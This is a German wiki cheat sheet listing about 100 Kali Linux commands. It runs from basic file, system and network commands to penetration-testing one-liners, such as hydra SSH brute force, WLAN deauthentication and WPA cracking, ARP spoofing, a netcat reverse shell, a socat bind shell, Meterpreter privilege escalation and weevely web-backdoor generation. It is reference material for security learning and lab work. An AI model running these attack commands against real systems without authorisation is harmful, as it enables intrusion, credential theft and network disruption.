100 Kali Kommandos

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Basic Linux Commands

Zeigt das aktuelle Arbeitsverzeichnis.
  • pwd
Listet Dateien und Verzeichnisse auf.
  • ls
Wechselt das Verzeichnis.
  • cd
Erstellt ein neues Verzeichnis.
  • mkdir <dir>
Löscht eine Datei.
  • rm <file>
Löscht ein Verzeichnis rekursiv.
  • rm -r <dir>
Kopiert Dateien.
  • cp <src> <dest>
Verschiebt oder benennt Dateien um.
  • mv <src> <dest>
Erstellt eine leere Datei.
  • touch <file>
Gibt den Inhalt einer Datei aus.
  • cat <file>
Öffnet eine Datei im Editor Nano.
  • nano <file>
Öffnet eine Datei im Editor Vim.
  • vim <file>
Sucht eine Datei anhand des Namens.
  • find / -name <filename>
Durchsucht eine Datei nach Textmustern.
  • grep "text" <file>
Zeigt die eingegebenen Befehle der Shell-Historie.
  • history


System Information Commands

Zeigt Systeminformationen.
  • uname -a
Zeigt den aktuellen Benutzer.
  • whoami
Zeigt UID und GID des Benutzers.
  • id
Zeigt die Systemlaufzeit.
  • uptime
Zeigt den belegten Festplattenplatz.
  • df -h
Zeigt die Größe eines Verzeichnisses.
  • du -sh <dir>
Zeigt aktive Prozesse.
  • top
Listet alle Prozesse auf.
  • ps aux
Beendet einen Prozess über die PID.
  • kill <PID>
Interaktiver Prozessmanager.
  • htop


User Management Commands

Erstellt einen neuen Benutzer.
  • adduser <username>
Löscht einen Benutzer.
  • deluser <username>
Ändert das Passwort eines Benutzers.
  • passwd <username>
Fügt einen Benutzer zur sudo-Gruppe hinzu.
  • usermod -aG sudo <username>
Zeigt Gruppenmitgliedschaften eines Benutzers.
  • groups <username>
Ändert Dateiberechtigungen.
  • chmod 777 <file>
Ändert Dateibesitzer und Gruppe.
  • chown user:group <file>


Networking Commands

Zeigt Netzwerkinterfaces an.
  • ifconfig
Zeigt IP-Adressen und Interfaces.
  • ip a
Zeigt Wireless-Interfaces an.
  • iwconfig
Testet Netzwerkverbindung via ICMP.
  • ping <IP>
Zeigt offene Ports mit Prozessen.
  • netstat -tulnp
Scant ein Zielsystem auf offene Ports.
  • nmap <IP>
Zeigt den Routingpfad zu einem Host.
  • traceroute <IP>
Lädt Daten von einer URL herunter.
  • curl <URL>
Lädt eine Datei von einer URL herunter.
  • wget <URL>
Zeigt DNS-Informationen zu einer Domain.
  • dig <domain>
Führt einfache DNS-Abfragen durch.
  • nslookup <domain>


Hacking & Penetration Testing

Startet die Metasploit-Konsole.
  • msfconsole
Erstellt Payloads.
  • msfvenom
Durchsucht Exploit-Datenbanken.
  • searchsploit <exploit>
Testet SQL-Injection gegen eine URL.
  • sqlmap -u <URL> --dbs
Bruteforced SSH-Zugänge.
  • hydra -l user -P pass.txt <IP> ssh
Crackt Hashes mit John the Ripper.
  • john --wordlist=rockyou.txt hash.txt
Aktiviert Monitor-Modus für WLAN.
  • airmon-ng start wlan0
Fängt WLAN-Pakete ab.
  • airodump-ng wlan0mon
Deauthentifiziert Clients.
  • aireplay-ng -0 10 -a <BSSID> wlan0mon
Crackt WPA/WPA2-Passwörter.
  • aircrack-ng -w rockyou.txt -b <BSSID> <capture>
Crackt Hashes mit GPU.
  • hashcat -m 2500 hash.txt rockyou.txt
Führt ARP-Spoofing durch.
  • ettercap -T -q -i eth0
Extrahiert Bilder aus Netzwerktraffic.
  • driftnet -i eth0
Zeichnet Netzwerkpakete auf.
  • tcpdump -i eth0
Analysiert Netzwerkverkehr.
  • tshark -i eth0
Scant Webserver auf Schwachstellen.
  • nikto -h <URL>
Führt Directory-Bruteforce durch.
  • gobuster dir -u <URL> -w /usr/share/wordlists/dirb/common.txt
Scant WordPress auf Schwachstellen.
  • wpscan --url <URL>


Privilege Escalation & Post-Exploitation

Zeigt sudo-Berechtigungen.
  • sudo -l
Wechselt zum root-Benutzer.
  • sudo su
Erstellt eine interaktive Shell in Python.
  • python -c 'import pty; pty.spawn("/bin/bash")'
Startet einen Netcat-Listener.
  • nc -lvnp <port>
Erzeugt eine Reverse-Shell.
  • nc <IP> <port> -e /bin/bash
Zeigt den aktuellen Benutzer in Meterpreter.
  • meterpreter> getuid
Versucht Privilege Escalation in Meterpreter.
  • meterpreter> getsystem
Überträgt Dateien via Meterpreter.
  • meterpreter> upload / download <file>
Öffnet eine System-Shell im Meterpreter.
  • meterpreter> shell
Schlägt mögliche PrivEsc-Exploits vor.
  • linux-exploit-suggester


File & Data Encryption

Verschlüsselt eine Datei.
  • gpg -c <file>
Entschlüsselt eine GPG-Datei.
  • gpg -d <file.gpg>
Verschlüsselt Dateien mit OpenSSL.
  • openssl enc -aes-256-cbc -salt -in <file> -out <file.enc>
Entschlüsselt OpenSSL AES-Dateien.
  • openssl enc -d -aes-256-cbc -in <file.enc> -out <file>


Forensics & Steganography

Extrahiert druckbare Zeichenketten.
  • strings <file>
Analysiert Binärdateien auf Strukturen.
  • binwalk <file>
Extrahiert Dateien aus Images.
  • foremost -i <image>
Zeigt Metadaten einer Datei.
  • exiftool <file>
Findet versteckte Daten in Bildern.
  • stegseek <stegfile>


Password & Hash Cracking

Erkennt Hash-Typen.
  • hashid <hash>
Führt SSH-Bruteforce durch.
  • hydra -L users.txt -P passwords.txt ssh://<IP>
Crackt Passwort-Hashes.
  • john hash.txt --wordlist=rockyou.txt


Web Application Testing

Führt Directory Enumeration durch.
  • dirb <URL>
Führt Web-Fuzzing durch.
  • wfuzz -c -z file,wordlist.txt --hc 404 <URL>/FUZZ
Testet Webanwendungen auf XSS.
  • xsssniper -u <URL>
Testet Webanwendungen auf Command Injection.
  • commix --url <URL>
Startet Burp Suite.
  • burpsuite


Miscellaneous

Erstellt Wordlists.
  • crunch 8 8 abcdefghijklmnopqrstuvwxyz
Führt nmap über Proxychains aus.
  • proxychains nmap -sT -Pn <IP>
Startet den Tor-Dienst.
  • tor
Startet einen MITM-Proxy.
  • mitmproxy
Startet das Social Engineering Toolkit.
  • setoolkit
Erstellt Wordlists aus Webseiten.
  • cewl -w words.txt -d 5 <URL>
Erstellt einen Web-Backdoor mit weevely.
  • weevely generate password backdoor.php
Startet eine bind shell via socat.
  • socat TCP-LISTEN:4444,fork EXEC:/bin/bash
Zeigt Domaininformationen.
  • whois <domain>
Sammelt Mails und Subdomains.
  • theHarvester -d <domain> -l 100 -b google
Crackt ZIP-Passwörter.
  • fcrackzip -u -D -p rockyou.txt <file.zip>
Sucht Subdomains einer Domain.
  • dnsmap -d <domain>